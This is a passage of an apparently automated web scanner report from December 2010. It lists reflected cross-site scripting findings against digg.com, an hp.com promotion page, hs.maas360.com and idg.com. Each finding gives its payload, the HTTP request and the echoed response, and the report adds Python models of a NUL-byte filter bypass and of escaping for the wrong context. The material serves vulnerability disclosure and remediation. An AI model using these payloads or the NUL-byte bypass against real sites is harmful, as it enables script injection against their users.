NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0029eb0"><script>alert(1)</script>55798b8d873 HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:56:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Sat, 15-Jan-2011 14:56:44 GMT; path=/; domain=digg.com
Set-Cookie: d=6314c08fb07e75c8fc37ada4064b945418a49163cfa4e84e32b221b946b5dcbd; expires=Wed, 16-Dec-2020 01:04:24 GMT; path=/; domain=.digg.com
X-Digg-Time: D=232451 10.2.128.255
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15306

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0029eb0"><script>alert(1)</script>55798b8d873.rss">
...[SNIP]...

2.94. http://digg.com/submit/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0099d9f"><script>alert(1)</script>ce39e2bb6df was submitted in the REST URL parameter 1. This input was echoed as 99d9f"><script>alert(1)</script>ce39e2bb6df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%0099d9f"><script>alert(1)</script>ce39e2bb6df/ HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 16 Dec 2010 14:56:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1938518164606297025%3A141; expires=Sat, 15-Jan-2011 14:56:51 GMT; path=/; domain=digg.com
Set-Cookie: d=2f20fe84cebb2890d911e48925fd04191c6abbab9f05bb77310e9fe59ba4facb; expires=Wed, 16-Dec-2020 01:04:31 GMT; path=/; domain=.digg.com
X-Digg-Time: D=219386 10.2.130.26
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 15307

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg - error_ - Profile</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics,
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%0099d9f"><script>alert(1)</script>ce39e2bb6df/.rss">
...[SNIP]...
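Added example, not part of the scanner output above: a Python model of the two-layer setup that items 2.93 and 2.94 describe, a native-code filter in front of an application that echoes the raw request target into an href attribute. Once %00 is URL-decoded, the filter's view of the path stops at the NUL byte, so the "><script> fragment after it is never matched against its rules, while the application copies the undecoded path (literal %00 included) into the attribute, which is exactly what the href in the 2.93 response shows. The filter rules, the handle() pipeline and the application-side NUL rejection are constructed for illustration. Rejecting NUL is defence in depth only; the root cause is that the value is written into the attribute without encoding, and no upstream filter can fix that for the application.

```python
from urllib.parse import unquote

# Constructed model of the setup described in 2.93/2.94: a native-code filter
# in front of an application that echoes the request target into an attribute.

BLOCKED_FRAGMENTS = ('"><', '<script')   # assumed filter rules, for illustration only


def native_filter_view(raw_path: str) -> str:
    """What a C-style string filter sees: the URL-decoded path, cut at the first NUL."""
    decoded = unquote(raw_path)
    nul = decoded.find('\x00')
    return decoded if nul == -1 else decoded[:nul]


def waf_blocks(raw_path: str) -> bool:
    """The filter matches its rules against the truncated view only."""
    view = native_filter_view(raw_path).lower()
    return any(fragment in view for fragment in BLOCKED_FRAGMENTS)


def app_renders(raw_path: str) -> str:
    """The application copies the raw (still %-encoded) request target into the href,
    as the 2.93 response shows: href="/submit%0029eb0">..."""
    return ('<link rel="alternate" type="application/rss+xml" title="Digg" '
            f'href="{raw_path}.rss">')


def app_rejects_nul(raw_path: str) -> bool:
    """Application-side defence in depth: a path that decodes to a NUL byte is never
    legitimate and should be refused before anything is rendered."""
    return '\x00' in unquote(raw_path)


def handle(raw_path: str) -> tuple:
    """Filter first, then the application's own guard, then the (unsafe) rendering."""
    if waf_blocks(raw_path):
        return ('blocked-by-filter', None)
    if app_rejects_nul(raw_path):
        return ('rejected-by-app', None)
    return ('rendered', app_renders(raw_path))


# Probes from 2.93: the same payload without and with the leading %00.
PROBE_PLAIN = '/submit29eb0"><script>alert(1)</script>55798b8d873'
PROBE_NUL = '/submit%0029eb0"><script>alert(1)</script>55798b8d873'

if __name__ == '__main__':
    print(waf_blocks(PROBE_PLAIN))                # True: the filter sees the whole path
    print(waf_blocks(PROBE_NUL))                  # False: the filter sees only "/submit"
    print('<script>' in app_renders(PROBE_NUL))   # True: the app echoes everything after the NUL
    print(handle(PROBE_NUL))                      # ('rejected-by-app', None)
```

The native_filter_view() return value is the whole explanation: the filter evaluates "/submit" and passes the request, and the application is the first component that sees the payload.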

2.95. https://h30406.www3.hp.com/campaigns/2010/promo/1-8KF4V/landing.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://h30406.www3.hp.com
Path:   /campaigns/2010/promo/1-8KF4V/landing.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51aa9"><a>24e2ae1112b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /campaigns/2010/promo/1-8KF4V/landing.php?51aa9"><a>24e2ae1112b=1 HTTP/1.1
Host: h30406.www3.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 16 Dec 2010 14:56:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-type: text/html
X-Powered-By: PHP/4.3.8
Set-Cookie: regioncodecookie=NA; expires=Thu, 16-Dec-2010 14:57:50 GMT; path=/; domain=.hp.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns:v="urn:schema
...[SNIP]...
<iframe src="box1.php?51aa9"><a>24e2ae1112b=1" name="" id="overlay-iframe" width="416" height="250" marginwidth="6" marginheight="6" align="middle" frameborder="0" scrolling="no">
...[SNIP]...

2.96. http://hs.maas360.com/white-paper/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26bf"><script>alert(1)</script>4ded530f900 was submitted in the REST URL parameter 1. This input was echoed as b26bf\"><script>alert(1)</script>4ded530f900 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /white-paperb26bf"><script>alert(1)</script>4ded530f900/ HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:57:16 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Thu, 16 Dec 2010 14:57:17 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paperb26bf\"><script>alert(1)</script>4ded530f900/"/>
...[SNIP]...

2.97. http://hs.maas360.com/white-paper/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://hs.maas360.com
Path:   /white-paper/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9034b"><script>alert(1)</script>2067fc0dbd3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9034b\"><script>alert(1)</script>2067fc0dbd3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /white-paper/?9034b"><script>alert(1)</script>2067fc0dbd3=1 HTTP/1.1
Host: hs.maas360.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 16 Dec 2010 14:56:54 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://forum.maas360.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Link: <>; rel=shortlink
Last-Modified: Thu, 16 Dec 2010 14:56:55 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11"><script type="
...[SNIP]...
<input type="hidden" name="redirect_to" value="http://hs.maas360.com/white-paper/?9034b\"><script>alert(1)</script>2067fc0dbd3=1"/>
...[SNIP]...
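Added example, not the maas360 site's own code: items 2.96 and 2.97 both show the value reflected as b26bf\"> and 9034b\">, i.e. the double quote was backslash-escaped, the way PHP's addslashes() or a JavaScript-string escaper would do it. That is escaping for the wrong context. An HTML parser gives a backslash no meaning inside an attribute, so the quote still terminates value="..." and the <script> tag that follows is parsed as markup. The block below renders the hidden redirect_to field with both escapers and uses Python's html.parser to show which tags a browser-style tokenizer actually sees. The render function and the addslashes() re-implementation are constructed; html.escape(..., quote=True) is the correct entity encoding for a double-quoted attribute.

```python
import html
from html.parser import HTMLParser


def addslashes(value: str) -> str:
    """Constructed re-implementation of the backslash escaping the responses show
    (PHP addslashes() behaviour). Correct for a JS string, useless in an HTML attribute."""
    return (value.replace('\\', '\\\\')
                 .replace('"', '\\"')
                 .replace("'", "\\'"))


def render_redirect_input(url: str, escape) -> str:
    """The hidden redirect_to field from the 404 page, with a pluggable escaper."""
    return f'<input type="hidden" name="redirect_to" value="{escape(url)}"/>'


class _TagCollector(HTMLParser):
    """Records every start tag the HTML parser sees and the <input> attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.input_attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == 'input':
            self.input_attrs = dict(attrs)

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)


def parse_tags(markup: str):
    """Return (start tags in order, attributes of the <input>) as the HTML tokenizer
    sees them; attribute values come back entity-decoded."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags, parser.input_attrs


# Request target from 2.96.
PROBE_URL = 'http://hs.maas360.com/white-paperb26bf"><script>alert(1)</script>4ded530f900/'


def html_escape(value: str) -> str:
    return html.escape(value, quote=True)


def tags_with_addslashes():
    """Backslash escaping: the quote still closes the attribute, <script> becomes a tag."""
    return parse_tags(render_redirect_input(PROBE_URL, addslashes))[0]


def tags_with_html_escape():
    """Entity encoding: the whole payload stays inside the attribute value."""
    return parse_tags(render_redirect_input(PROBE_URL, html_escape))[0]


def roundtrip_value_with_html_escape():
    """The encoded attribute decodes back to the original URL, so nothing is lost."""
    return parse_tags(render_redirect_input(PROBE_URL, html_escape))[1].get('value')


if __name__ == '__main__':
    print(tags_with_addslashes())                              # ['input', 'script']
    print(tags_with_html_escape())                             # ['input']
    print(roundtrip_value_with_html_escape() == PROBE_URL)     # True
```

The tag list is the check to apply when reviewing a fix for findings like these: if the parser reports a script tag from a value that was supposed to be an attribute, the escaping is for the wrong context, whatever characters it happens to prefix with a backslash.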

2.98. http://idg.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload faf07"-alert(1)-"514680829c4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?faf07"-alert(1)-"514680829c4=1 HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:33 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5016
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/homenew.nsf?faf07"-alert(1)-"514680829c4=1");
} catch(err) {}</script>
...[SNIP]...

2.99. http://idg.com/idgnetrssfeeds.nsf/html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /idgnetrssfeeds.nsf/html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 641dd"%3be72f5765b93 was submitted in the REST URL parameter 2. This input was echoed as 641dd";e72f5765b93 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idgnetrssfeeds.nsf/html641dd"%3be72f5765b93?openpage HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5020
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html641dd";e72f5765b93?openpage");
} catch(err) {}</script>
...[SNIP]...

2.100. http://idg.com/idgnetrssfeeds.nsf/html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /idgnetrssfeeds.nsf/html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e793d"-alert(1)-"6a220bac59d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idgnetrssfeeds.nsf/html?e793d"-alert(1)-"6a220bac59d=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:01:13 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5024
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html?e793d"-alert(1)-"6a220bac59d=1");
} catch(err) {}</script>
...[SNIP]...

2.101. http://idg.com/idgnetrssfeeds.nsf/html [openpage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /idgnetrssfeeds.nsf/html

Issue detail

The value of the openpage request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cfb4"-alert(1)-"de20b25edcb was submitted in the openpage parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /idgnetrssfeeds.nsf/html?openpage8cfb4"-alert(1)-"de20b25edcb HTTP/1.1
Host: idg.com
Proxy-Connection: keep-alive
Referer: http://idg.com/www/homenew.nsf/home?readform
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1291272495.1

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:35 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5030
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /idgnetrssfeeds.nsf/html?openpage8cfb4"-alert(1)-"de20b25edcb");
} catch(err) {}</script>
...[SNIP]...

2.102. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Brands

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5bcd"%3b240f4a66d20 was submitted in the REST URL parameter 1. This input was echoed as f5bcd";240f4a66d20 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /wwwf5bcd"%3b240f4a66d20/HomeNew.nsf/docs/Brands HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /wwwf5bcd";240f4a66d20/HomeNew.nsf/docs/Brands");
} catch(err) {}</script>
...[SNIP]...

2.103. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Brands

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 616ac"%3b7e80440585b was submitted in the REST URL parameter 3. This input was echoed as 616ac";7e80440585b in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs616ac"%3b7e80440585b/Brands HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs616ac";7e80440585b/Brands");
} catch(err) {}</script>
...[SNIP]...

2.104. http://idg.com/www/HomeNew.nsf/docs/Brands [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Brands

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d4c8"%3b7c6e698891a was submitted in the REST URL parameter 4. This input was echoed as 8d4c8";7c6e698891a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/Brands8d4c8"%3b7c6e698891a HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5015
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Brands8d4c8";7c6e698891a");
} catch(err) {}</script>
...[SNIP]...

2.105. http://idg.com/www/HomeNew.nsf/docs/Brands [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://idg.com
Path:   /www/HomeNew.nsf/docs/Brands

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5392"-alert(1)-"907c7a6363a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /www/HomeNew.nsf/docs/Brands?f5392"-alert(1)-"907c7a6363a=1 HTTP/1.1
Host: idg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;

Response

HTTP/1.1 400 Bad Request
Server: Lotus-Domino
Date: Thu, 16 Dec 2010 13:00:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 5028
Cache-control: no-cache

<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" />
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" />
<!-- Section for ordinary idg.co
...[SNIP]...
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-79134-4");
pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/Brands?f5392"-alert(1)-"907c7a6363a=1");
} catch(err) {}</script>
...[SNIP]...

2.106. http://idg.com/www/HomeNew.nsf/docs/FAQ [REST URL parameter 1]

Summary

Severity:   High
